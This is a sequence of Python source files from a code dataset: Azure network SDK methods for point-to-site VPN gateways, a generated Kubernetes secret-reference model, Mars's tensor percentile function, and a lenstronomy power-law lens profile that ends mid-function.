            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch a single page; fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/p2svpnGateways'}  # type: ignore
    def _generate_vpn_profile_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        parameters,  # type: "_models.P2SVpnProfileParameters"
        **kwargs  # type: Any
    ):
        # type: (...) -> Optional["_models.VpnProfileResponse"]
        """Issue the initial POST of the generate-VPN-profile long-running
        operation.
        Returns the deserialized ``VpnProfileResponse`` when the service replies
        200, or ``None`` when it replies 202 (accepted, still running).
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.VpnProfileResponse"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-09-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._generate_vpn_profile_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'P2SVpnProfileParameters')
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 carries a response body to deserialize.
            deserialized = self._deserialize('VpnProfileResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _generate_vpn_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/generatevpnprofile'}  # type: ignore
    def begin_generate_vpn_profile(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        parameters,  # type: "_models.P2SVpnProfileParameters"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.VpnProfileResponse"]
        """Generates VPN profile for P2S client of the P2SVpnGateway in the specified resource group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param gateway_name: The name of the P2SVpnGateway.
        :type gateway_name: str
        :param parameters: Parameters supplied to the generate P2SVpnGateway VPN client package
         operation.
        :type parameters: ~azure.mgmt.network.v2019_09_01.models.P2SVpnProfileParameters
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: Pass in True if you'd like the ARMPolling polling method,
         False for no polling, or your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either VpnProfileResponse or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.VpnProfileResponse]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnProfileResponse"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Kick off the LRO; the identity ``cls`` lambda preserves the raw
            # pipeline response so the poller can drive the operation from it.
            raw_result = self._generate_vpn_profile_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial request; must not be re-sent while polling.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('VpnProfileResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        # Used by ARMPolling to format templated polling URLs ('location' final state).
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_generate_vpn_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/generatevpnprofile'}  # type: ignore
    def _get_p2_s_vpn_connection_health_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Optional["_models.P2SVpnGateway"]
        """Issue the initial POST of the get-P2S-VPN-connection-health
        long-running operation.
        Returns the deserialized ``P2SVpnGateway`` on 200, or ``None`` on 202
        (accepted, still running).
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.P2SVpnGateway"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-09-01"
        accept = "application/json"
        # Construct URL
        url = self._get_p2_s_vpn_connection_health_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # POST with no request body.
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 carries a response body to deserialize.
            deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _get_p2_s_vpn_connection_health_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealth'}  # type: ignore
    def begin_get_p2_s_vpn_connection_health(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.P2SVpnGateway"]
        """Gets the connection health of P2S clients of the virtual wan P2SVpnGateway in the specified
        resource group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param gateway_name: The name of the P2SVpnGateway.
        :type gateway_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: Pass in True if you'd like the ARMPolling polling method,
         False for no polling, or your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either P2SVpnGateway or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnGateway"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Kick off the LRO; the identity ``cls`` lambda preserves the raw
            # pipeline response so the poller can drive the operation from it.
            raw_result = self._get_p2_s_vpn_connection_health_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial request; must not be re-sent while polling.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        # Used by ARMPolling to format templated polling URLs ('location' final state).
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_p2_s_vpn_connection_health.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealth'}  # type: ignore
    def _get_p2_s_vpn_connection_health_detailed_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        request,  # type: "_models.P2SVpnConnectionHealthRequest"
        **kwargs  # type: Any
    ):
        # type: (...) -> Optional["_models.P2SVpnConnectionHealth"]
        """Issue the initial POST of the detailed-connection-health
        long-running operation.
        Returns the deserialized ``P2SVpnConnectionHealth`` on 200, or ``None``
        on 202 (accepted, still running).
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.P2SVpnConnectionHealth"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-09-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._get_p2_s_vpn_connection_health_detailed_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(request, 'P2SVpnConnectionHealthRequest')
        body_content_kwargs['content'] = body_content
        # NOTE: rebinds the ``request`` parameter with the outgoing HTTP request
        # object; the model has already been serialized into ``body_content``.
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 carries a response body to deserialize.
            deserialized = self._deserialize('P2SVpnConnectionHealth', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _get_p2_s_vpn_connection_health_detailed_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealthDetailed'}  # type: ignore
    def begin_get_p2_s_vpn_connection_health_detailed(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        request,  # type: "_models.P2SVpnConnectionHealthRequest"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.P2SVpnConnectionHealth"]
        """Gets the sas url to get the connection health detail of P2S clients of the virtual wan
        P2SVpnGateway in the specified resource group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param gateway_name: The name of the P2SVpnGateway.
        :type gateway_name: str
        :param request: Request parameters supplied to get p2s vpn connections detailed health.
        :type request: ~azure.mgmt.network.v2019_09_01.models.P2SVpnConnectionHealthRequest
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: Pass in True if you'd like the ARMPolling polling method,
         False for no polling, or your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either P2SVpnConnectionHealth or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnConnectionHealth]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnConnectionHealth"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Kick off the LRO; the identity ``cls`` lambda preserves the raw
            # pipeline response so the poller can drive the operation from it.
            raw_result = self._get_p2_s_vpn_connection_health_detailed_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                request=request,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial request; must not be re-sent while polling.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('P2SVpnConnectionHealth', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        # Used by ARMPolling to format templated polling URLs ('location' final state).
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_p2_s_vpn_connection_health_detailed.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealthDetailed'}  # type: ignore
| 50.277897 | 248 | 0.667556 |
fee121e91f15c0fb122ff98f7dadff1010d8f474 | 3,958 | py | Python | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1SecretReference(object):
    """Reference to a Kubernetes secret by name and namespace.

    NOTE: This class is auto generated by the swagger code generator program.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the definition.
    """

    swagger_types = {
        'name': 'str',
        'namespace': 'str'
    }

    attribute_map = {
        'name': 'name',
        'namespace': 'namespace'
    }

    def __init__(self, name=None, namespace=None):
        """V1SecretReference - a model defined in Swagger.

        :param name: Name unique within a namespace to reference a secret
            resource.
        :type name: str
        :param namespace: Namespace within which the secret name must be
            unique.
        :type namespace: str
        """
        self._name = None
        self._namespace = None
        self.discriminator = None
        if name is not None:
            self.name = name
        if namespace is not None:
            self.namespace = namespace

    @property
    def name(self):
        """Name is unique within a namespace to reference a secret resource.

        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Set the name of this V1SecretReference.

        :type name: str
        """
        self._name = name

    @property
    def namespace(self):
        """Namespace defines the space within which the secret name must be unique.

        :rtype: str
        """
        return self._namespace

    @namespace.setter
    def namespace(self, namespace):
        """Set the namespace of this V1SecretReference.

        :type namespace: str
        """
        self._namespace = namespace

    def to_dict(self):
        """Return the model properties as a dict.

        Nested models (anything exposing ``to_dict``) are converted
        recursively, inside lists and dicts as well.
        """
        result = {}
        # Iterate the declared attributes directly; this removes the runtime
        # dependency on ``six.iteritems`` the generator originally emitted.
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    k: v.to_dict() if hasattr(v, "to_dict") else v
                    for k, v in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Return True if both objects are equal."""
        if not isinstance(other, V1SecretReference):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Return True if both objects are not equal."""
        return not self == other
f023956c3093611564ed32065189f13dc835a269 | 6,015 | py | Python | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 2,413 | 2018-12-06T09:37:11.000Z | 2022-03-30T15:47:39.000Z | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 1,335 | 2018-12-07T03:06:18.000Z | 2022-03-31T11:45:57.000Z | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 329 | 2018-12-07T03:12:41.000Z | 2022-03-29T21:49:57.000Z | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from ...core import ENTITY_TYPE
from ..arithmetic import truediv
from .quantile import _quantile_unchecked, _quantile_is_valid
# Shared message for percentiles outside [0, 100]; also forwarded to
# ``_quantile_unchecked`` so deferred (tensor-valued ``q``) validation raises
# the same text.
q_error_msg = "Percentiles must be in the range [0, 100]"
def percentile(a, q, axis=None, out=None, overwrite_input=False,
               interpolation='linear', keepdims=False):
    """
    Compute the q-th percentile of the data along the specified axis.

    Returns the q-th percentile(s) of the array elements.

    Parameters
    ----------
    a : array_like
        Input tensor or object that can be converted to a tensor.
    q : array_like of float
        Percentile or sequence of percentiles to compute; each must lie in
        the inclusive range [0, 100].
    axis : {int, tuple of int, None}, optional
        Axis or axes along which the percentiles are computed. By default
        the percentile(s) are computed over a flattened version of the
        tensor.
    out : ndarray, optional
        Alternative output array in which to place the result. It must have
        the same shape and buffer length as the expected output, but the
        type (of the output) will be cast if necessary.
    overwrite_input : bool, optional
        Present for NumPy API compatibility only; it has no effect here.
    interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
        Interpolation method used when the desired percentile lies between
        two data points ``i < j``:

        * 'linear': ``i + (j - i) * fraction``, where ``fraction`` is the
          fractional part of the index surrounded by ``i`` and ``j``.
        * 'lower': ``i``.
        * 'higher': ``j``.
        * 'nearest': ``i`` or ``j``, whichever is nearest.
        * 'midpoint': ``(i + j) / 2``.
    keepdims : bool, optional
        If True, the reduced axes are left in the result as dimensions of
        size one, so the result broadcasts correctly against `a`.

    Returns
    -------
    percentile : scalar or ndarray
        A scalar for a single percentile with ``axis=None``; otherwise the
        first axis of the result corresponds to the percentiles and the
        remaining axes are those left after the reduction of `a`. Inputs of
        integer or sub-``float64`` floating types yield ``float64`` output;
        otherwise the output dtype matches the input. If `out` is given,
        that array is returned instead.

    See Also
    --------
    mean
    median : equivalent to ``percentile(..., 50)``
    nanpercentile
    quantile : equivalent to percentile, except with q in the range [0, 1].

    Examples
    --------
    >>> import mars.tensor as mt

    >>> a = mt.array([[10, 7, 4], [3, 2, 1]])
    >>> mt.percentile(a, 50).execute()
    3.5
    >>> mt.percentile(a, 50, axis=0).execute()
    array([6.5, 4.5, 2.5])
    >>> mt.percentile(a, 50, axis=1).execute()
    array([7., 2.])
    """
    if isinstance(q, ENTITY_TYPE):
        # ``q`` is a (lazy) tensor: rescale it with the tensor op and defer
        # the range validation to ``_quantile_unchecked``.
        fraction = truediv(q, 100)
    else:
        fraction = np.true_divide(np.asanyarray(q), 100)
        # Concrete values can be validated immediately.
        if not _quantile_is_valid(fraction):
            raise ValueError(q_error_msg)
    return _quantile_unchecked(a, fraction, axis=axis, out=out,
                               overwrite_input=overwrite_input,
                               interpolation=interpolation,
                               keepdims=keepdims,
                               q_error_msg=q_error_msg)
| 36.90184 | 92 | 0.609643 |
c36f9f7f9418e2f2919b628f31db8666f993916d | 6,483 | py | Python | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | 1 | 2020-07-31T07:55:17.000Z | 2020-07-31T07:55:17.000Z | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | null | null | null | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | 2 | 2020-10-26T10:45:11.000Z | 2021-03-04T12:25:19.000Z | __author__ = 'sibirrer'
import numpy as np
import scipy.special as special
from lenstronomy.LensModel.Profiles.base_profile import LensProfileBase
class SPP(LensProfileBase):
    """
    Class for a circular power-law mass distribution.

    The 3d density profile is rho(r) = rho0 / r^gamma; the lensing
    quantities are parameterized by the Einstein radius ``theta_E`` and the
    power-law slope ``gamma``.
    """
    param_names = ['theta_E', 'gamma', 'center_x', 'center_y']
    lower_limit_default = {'theta_E': 0, 'gamma': 1.5, 'center_x': -100, 'center_y': -100}
    upper_limit_default = {'theta_E': 100, 'gamma': 2.5, 'center_x': 100, 'center_y': 100}

    def function(self, x, y, theta_E, gamma, center_x=0, center_y=0):
        """
        Lensing potential of the power-law profile.

        :param x: set of x-coordinates
        :type x: array of size (n)
        :param y: set of y-coordinates
        :type y: array of size (n)
        :param theta_E: Einstein radius of lens
        :type theta_E: float
        :param gamma: power law slope of mass profile
        :type gamma: float
        :param center_x: x-coordinate of profile center
        :param center_y: y-coordinate of profile center
        :returns: lensing potential at (x, y)
        :raises: AttributeError, KeyError
        """
        gamma = self._gamma_limit(gamma)
        x_ = x - center_x
        y_ = y - center_y
        # E is the profile normalization in angular units (a.k.a. phi_E_spp)
        E = theta_E / ((3. - gamma) / 2.) ** (1. / (1. - gamma))
        eta = -gamma + 3
        p2 = x_ ** 2 + y_ ** 2
        s2 = 0.  # softening scale (currently disabled)
        return 2 * E ** 2 / eta ** 2 * ((p2 + s2) / E ** 2) ** (eta / 2)

    def derivatives(self, x, y, theta_E, gamma, center_x=0., center_y=0.):
        """
        Deflection angles (gradient of the lensing potential).

        :param x: x-coordinate(s)
        :param y: y-coordinate(s)
        :param theta_E: Einstein radius of lens
        :param gamma: power law slope of mass profile
        :param center_x: x-coordinate of profile center
        :param center_y: y-coordinate of profile center
        :return: f_x, f_y deflection components
        """
        gamma = self._gamma_limit(gamma)
        xt1 = x - center_x
        xt2 = y - center_y
        r2 = xt1 * xt1 + xt2 * xt2
        # floor the squared radius to avoid a division by zero at the center
        a = np.maximum(r2, 0.000001)
        r = np.sqrt(a)
        alpha = theta_E * (r2 / theta_E ** 2) ** (1 - gamma / 2.)
        fac = alpha / r
        f_x = fac * xt1
        f_y = fac * xt2
        return f_x, f_y

    def hessian(self, x, y, theta_E, gamma, center_x=0., center_y=0.):
        """
        Second derivatives of the lensing potential (f_xx, f_yy, f_xy).

        :param x: x-coordinate(s)
        :param y: y-coordinate(s)
        :param theta_E: Einstein radius of lens
        :param gamma: power law slope of mass profile
        :param center_x: x-coordinate of profile center
        :param center_y: y-coordinate of profile center
        :return: f_xx, f_yy, f_xy components of the Hessian
        """
        gamma = self._gamma_limit(gamma)
        xt1 = x - center_x
        xt2 = y - center_y
        E = theta_E / ((3. - gamma) / 2.) ** (1. / (1. - gamma))
        # E = phi_E_spp
        eta = -gamma + 3.
        P2 = xt1 ** 2 + xt2 ** 2
        if isinstance(P2, (int, float)):
            # scalar input: floor at a small value to avoid division by zero
            a = max(0.000001, P2)
        else:
            # array input: replace exact zeros (the SIS regime) by the floor
            a = np.empty_like(P2)
            p2 = P2[P2 > 0]  # in the SIS regime
            a[P2 == 0] = 0.000001
            a[P2 > 0] = p2
        kappa = 1. / eta * (a / E ** 2) ** (eta / 2 - 1) * ((eta - 2) * (xt1 ** 2 + xt2 ** 2) / a + 2)
        gamma1 = 1. / eta * (a / E ** 2) ** (eta / 2 - 1) * ((eta / 2 - 1) * (2 * xt1 ** 2 - 2 * xt2 ** 2) / a)
        gamma2 = 4 * xt1 * xt2 * (1. / 2 - 1 / eta) * (a / E ** 2) ** (eta / 2 - 2) / E ** 2
        f_xx = kappa + gamma1
        f_yy = kappa - gamma1
        f_xy = gamma2
        return f_xx, f_yy, f_xy

    @staticmethod
    def rho2theta(rho0, gamma):
        """
        Converts the 3d density normalization into the 2d projected density
        parameter (Einstein radius).

        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :return: Einstein radius theta_E
        """
        fac = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * 2 / (3 - gamma) * rho0
        # fac = theta_E**(gamma - 1)
        theta_E = fac ** (1. / (gamma - 1))
        return theta_E

    @staticmethod
    def theta2rho(theta_E, gamma):
        """
        Converts the projected density parameter (in units of deflection)
        into the 3d density parameter.

        :param theta_E: Einstein radius
        :param gamma: power-law slope
        :return: 3d density normalization rho0
        """
        fac1 = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * 2 / (3 - gamma)
        fac2 = theta_E ** (gamma - 1)
        rho0 = fac2 / fac1
        return rho0

    @staticmethod
    def mass_3d(r, rho0, gamma):
        """
        Mass enclosed within a 3d sphere of radius r.

        :param r: 3d radius
        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :return: enclosed 3d mass
        """
        mass_3d = 4 * np.pi * rho0 / (-gamma + 3) * r ** (-gamma + 3)
        return mass_3d

    def mass_3d_lens(self, r, theta_E, gamma):
        """
        Mass enclosed within a 3d sphere of radius r, parameterized in
        lensing units (Einstein radius).

        :param r: 3d radius
        :param theta_E: Einstein radius
        :param gamma: power-law slope
        :return: enclosed 3d mass
        """
        rho0 = self.theta2rho(theta_E, gamma)
        return self.mass_3d(r, rho0, gamma)

    def mass_2d(self, r, rho0, gamma):
        """
        Mass enclosed within a projected (2d) circle of radius r.

        :param r: projected radius
        :param rho0: 3d density normalization
        :param gamma: power-law slope
        :return: enclosed projected mass
        """
        alpha = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * r ** (2 - gamma) / (3 - gamma) * np.pi * 2 * rho0
        mass_2d = alpha * r
